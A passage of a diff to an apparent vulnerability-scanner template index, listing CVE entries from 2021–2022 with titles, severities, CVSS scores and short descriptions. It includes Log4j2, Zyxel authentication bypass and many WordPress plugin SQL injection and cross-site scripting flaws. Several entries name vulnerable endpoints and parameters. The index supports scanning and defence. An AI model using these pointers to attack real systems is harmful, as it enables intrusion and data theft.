interface.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37304.yaml"} +{"ID":"CVE-2021-37305","Info":{"Name":"Jeecg Boot \u003c= 2.4.5 - Sensitive Information Disclosure","Severity":"high","Description":"Jeecg Boot \u003c= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37305.yaml"} {"ID":"CVE-2021-37416","Info":{"Name":"Zoho ManageEngine ADSelfService Plus \u003c=6103 - Cross-Site Scripting","Severity":"medium","Description":"Zoho ManageEngine ADSelfService Plus 6103 and prior contains a reflected cross-site scripting vulnerability on the loadframe page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37416.yaml"} {"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} {"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"} @@ -1270,7 +1354,7 @@ {"ID":"CVE-2021-39144","Info":{"Name":"XStream 1.4.18 - Remote Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39144.yaml"} {"ID":"CVE-2021-39146","Info":{"Name":"XStream 1.4.18 - Arbitrary Code Execution","Severity":"high","Description":"XStream 1.4.18 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. Setups which followed XStream's security recommendations with an allow-list are not impacted.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39146.yaml"} {"ID":"CVE-2021-39152","Info":{"Name":"XStream \u003c1.4.18 - Server-Side Request Forgery","Severity":"high","Description":"XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.5"}},"file_path":"http/cves/2021/CVE-2021-39152.yaml"} -{"ID":"CVE-2021-39165","Info":{"Name":"Cachet \u003c=2.3.18 - SQL Injection","Severity":"high","Description":"Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet \u003chttps://github.com/CachetHQ/Cachet\u003e is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2021/CVE-2021-39165.yaml"} +{"ID":"CVE-2021-39165","Info":{"Name":"Cachet \u003c=2.3.18 - SQL Injection","Severity":"medium","Description":"Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet \u003chttps://github.com/CachetHQ/Cachet\u003e is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-39165.yaml"} {"ID":"CVE-2021-39211","Info":{"Name":"GLPI 9.2/\u003c9.5.6 - Information Disclosure","Severity":"medium","Description":"GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-39211.yaml"} {"ID":"CVE-2021-39226","Info":{"Name":"Grafana Snapshot - Authentication Bypass","Severity":"high","Description":"Grafana instances up to 7.5.11 and 8.1.5 allow remote unauthenticated users to view the snapshot associated with the lowest database key by accessing the literal paths /api/snapshot/:key or /dashboard/snapshot/:key. If the snapshot is in public mode, unauthenticated users can delete snapshots by accessing the endpoint /api/snapshots-delete/:deleteKey. Authenticated users can also delete snapshots by accessing the endpoints /api/snapshots-delete/:deleteKey, or sending a delete request to /api/snapshot/:key, regardless of whether or not the snapshot is set to public mode (disabled by default).","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2021/CVE-2021-39226.yaml"} {"ID":"CVE-2021-39312","Info":{"Name":"WordPress True Ranker \u003c2.2.4 - Local File Inclusion","Severity":"high","Description":"WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-39312.yaml"} @@ -1313,12 +1397,14 @@ {"ID":"CVE-2021-41349","Info":{"Name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","Severity":"medium","Description":"Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-41349.yaml"} {"ID":"CVE-2021-41381","Info":{"Name":"Payara Micro Community 5.2021.6 Directory Traversal","Severity":"high","Description":"Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41381.yaml"} {"ID":"CVE-2021-41432","Info":{"Name":"FlatPress 1.2.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2021/CVE-2021-41432.yaml"} +{"ID":"CVE-2021-41460","Info":{"Name":"ECShop 4.1.0 - SQL Injection","Severity":"high","Description":"ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41460.yaml"} {"ID":"CVE-2021-41467","Info":{"Name":"JustWriting - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41467.yaml"} {"ID":"CVE-2021-41569","Info":{"Name":"SAS/Internet 9.4 1520 - Local File Inclusion","Severity":"high","Description":"SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41569.yaml"} {"ID":"CVE-2021-41648","Info":{"Name":"PuneethReddyHC action.php SQL Injection","Severity":"high","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41648.yaml"} {"ID":"CVE-2021-41649","Info":{"Name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41649.yaml"} {"ID":"CVE-2021-41653","Info":{"Name":"TP-Link - OS Command Injection","Severity":"critical","Description":"The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41653.yaml"} {"ID":"CVE-2021-41691","Info":{"Name":"openSIS Student Information System 8.0 SQL Injection","Severity":"high","Description":"openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-41691.yaml"} +{"ID":"CVE-2021-41749","Info":{"Name":"CraftCMS SEOmatic - Server-Side Template Injection","Severity":"critical","Description":"In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41749.yaml"} {"ID":"CVE-2021-41773","Info":{"Name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","Severity":"high","Description":"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41773.yaml"} {"ID":"CVE-2021-41826","Info":{"Name":"PlaceOS 1.2109.1 - Open Redirection","Severity":"medium","Description":"PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41826.yaml"} {"ID":"CVE-2021-41878","Info":{"Name":"i-Panel Administration System 2.0 - Cross-Site Scripting","Severity":"medium","Description":"i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41878.yaml"} @@ -1352,6 +1438,7 @@ {"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"} {"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"} {"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"} +{"ID":"CVE-2021-44139","Info":{"Name":"Alibaba Sentinel - Server-side request forgery (SSRF)","Severity":"high","Description":"There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44139.yaml"} {"ID":"CVE-2021-44152","Info":{"Name":"Reprise License Manager 14.2 - Authentication Bypass","Severity":"critical","Description":"Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44152.yaml"} {"ID":"CVE-2021-44228","Info":{"Name":"Apache Log4j2 Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-44228.yaml"} {"ID":"CVE-2021-44427","Info":{"Name":"Rosario Student Information System Unauthenticated SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44427.yaml"} @@ -1375,6 +1462,7 @@ {"ID":"CVE-2021-46071","Info":{"Name":"ehicle Service Management System 1.0 - Cross-Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Category List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46071.yaml"} {"ID":"CVE-2021-46072","Info":{"Name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a stored cross-site scripting vulnerability via the Service List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46072.yaml"} {"ID":"CVE-2021-46073","Info":{"Name":"Vehicle Service Management System 1.0 - Cross Site Scripting","Severity":"medium","Description":"Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2021/CVE-2021-46073.yaml"} +{"ID":"CVE-2021-46107","Info":{"Name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","Severity":"high","Description":"Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46107.yaml"} {"ID":"CVE-2021-46379","Info":{"Name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","Severity":"medium","Description":"DLink DIR850 ET850-1.08TRb03 contains incorrect access control vulnerability in URL redirection, which can be used to mislead users to go to untrusted sites.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46379.yaml"} {"ID":"CVE-2021-46381","Info":{"Name":"D-Link DAP-1620 - Local File Inclusion","Severity":"high","Description":"D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-46381.yaml"} {"ID":"CVE-2021-46387","Info":{"Name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","Severity":"medium","Description":"ZyXEL ZyWALL 2 Plus Internet Security Appliance contains a cross-site scripting vulnerability. Insecure URI handling leads to bypass of security restrictions, which allows an attacker to execute arbitrary JavaScript codes to perform multiple attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-46387.yaml"} @@ -1388,6 +1476,7 @@ {"ID":"CVE-2022-0149","Info":{"Name":"WooCommerce Stored Exporter WordPress Plugin \u003c 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0149.yaml"} {"ID":"CVE-2022-0150","Info":{"Name":"WordPress Accessibility Helper \u003c0.6.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0150.yaml"} {"ID":"CVE-2022-0165","Info":{"Name":"WordPress Page Builder KingComposer \u003c=2.9.6 - Open Redirect","Severity":"medium","Description":"WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0165.yaml"} +{"ID":"CVE-2022-0169","Info":{"Name":"Photo Gallery by 10Web \u003c 1.6.0 - SQL Injection","Severity":"critical","Description":"The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0169.yaml"} {"ID":"CVE-2022-0189","Info":{"Name":"WordPress RSS Aggregator \u003c 4.20 - Authenticated Cross-Site Scripting","Severity":"medium","Description":"WordPress RSS Aggregator \u003c 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0189.yaml"} {"ID":"CVE-2022-0201","Info":{"Name":"WordPress Permalink Manager \u003c2.2.15 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0201.yaml"} {"ID":"CVE-2022-0206","Info":{"Name":"WordPress NewStatPress \u003c1.3.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0206.yaml"} @@ -1395,10 +1484,12 @@ {"ID":"CVE-2022-0212","Info":{"Name":"WordPress Spider Calendar \u003c=1.5.65 - Cross-Site Scripting","Severity":"medium","Description":"WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0212.yaml"} {"ID":"CVE-2022-0218","Info":{"Name":"HTML Email Template Designer \u003c 3.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0218.yaml"} {"ID":"CVE-2022-0220","Info":{"Name":"WordPress GDPR \u0026 CCPA \u003c1.9.27 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GDPR \u0026 CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an \"application/json\" content-type, and JavaScript code may be executed on a victim's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0220.yaml"} +{"ID":"CVE-2022-0228","Info":{"Name":"Popup Builder \u003c 4.0.7 - SQL Injection","Severity":"high","Description":"The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-0228.yaml"} {"ID":"CVE-2022-0234","Info":{"Name":"WordPress WOOCS \u003c 1.3.7.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0234.yaml"} {"ID":"CVE-2022-0271","Info":{"Name":"LearnPress \u003c4.1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0271.yaml"} {"ID":"CVE-2022-0281","Info":{"Name":"Microweber Information Disclosure","Severity":"high","Description":"Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0281.yaml"} {"ID":"CVE-2022-0288","Info":{"Name":"WordPress Ad Inserter \u003c2.7.10 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0288.yaml"} +{"ID":"CVE-2022-0342","Info":{"Name":"Zyxel - Authentication Bypass","Severity":"critical","Description":"An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0342.yaml"} {"ID":"CVE-2022-0346","Info":{"Name":"WordPress XML Sitemap Generator for Google \u003c2.0.4 - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0346.yaml"} {"ID":"CVE-2022-0349","Info":{"Name":"WordPress NotificationX \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0349.yaml"} {"ID":"CVE-2022-0378","Info":{"Name":"Microweber Cross-Site Scripting","Severity":"medium","Description":"Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0378.yaml"} @@ -1411,14 +1502,18 @@ {"ID":"CVE-2022-0437","Info":{"Name":"karma-runner DOM-based Cross-Site Scripting","Severity":"medium","Description":"NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0437.yaml"} {"ID":"CVE-2022-0441","Info":{"Name":"MasterStudy LMS \u003c2.7.6 - Improper Access Control","Severity":"critical","Description":"WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0441.yaml"} {"ID":"CVE-2022-0482","Info":{"Name":"Easy!Appointments \u003c1.4.3 - Broken Access Control","Severity":"critical","Description":"Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0482.yaml"} +{"ID":"CVE-2022-0533","Info":{"Name":"Ditty (formerly Ditty News Ticker) \u003c 3.0.15 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0533.yaml"} {"ID":"CVE-2022-0535","Info":{"Name":"WordPress E2Pdf \u003c1.16.45 - Cross-Site Scripting","Severity":"medium","Description":"WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-0535.yaml"} {"ID":"CVE-2022-0540","Info":{"Name":"Atlassian Jira Seraph - Authentication Bypass","Severity":"critical","Description":"Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0540.yaml"} -{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} +{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} {"ID":"CVE-2022-0594","Info":{"Name":"WordPress Shareaholic \u003c9.7.6 - Information Disclosure","Severity":"medium","Description":"WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0594.yaml"} {"ID":"CVE-2022-0595","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.6.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0595.yaml"} +{"ID":"CVE-2022-0597","Info":{"Name":"Microweber \u003c 1.2.11 - Open Redirection","Severity":"medium","Description":"Open Redirect in Packagist microweber/microweber prior to 1.2.11.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0597.yaml"} {"ID":"CVE-2022-0599","Info":{"Name":"WordPress Mapping Multiple URLs Redirect Same Page \u003c=5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0599.yaml"} +{"ID":"CVE-2022-0651","Info":{"Name":"WordPress Plugin WP Statistics \u003c= 13.1.5 - SQL Injection","Severity":"high","Description":"The WP Statistics WordPress plugin is vulnerable to SQL Injection due to insufficient escaping and parameterization of the current_page_type parameter found in the ~/includes/class-wp-statistics-hits.php file which allows attackers without authentication to inject arbitrary SQL queries to obtain sensitive information, in versions up to and including 13.1.5.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0651.yaml"} {"ID":"CVE-2022-0653","Info":{"Name":"Wordpress Profile Builder Plugin Cross-Site Scripting","Severity":"medium","Description":"The Profile Builder User Profile \u0026 User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the 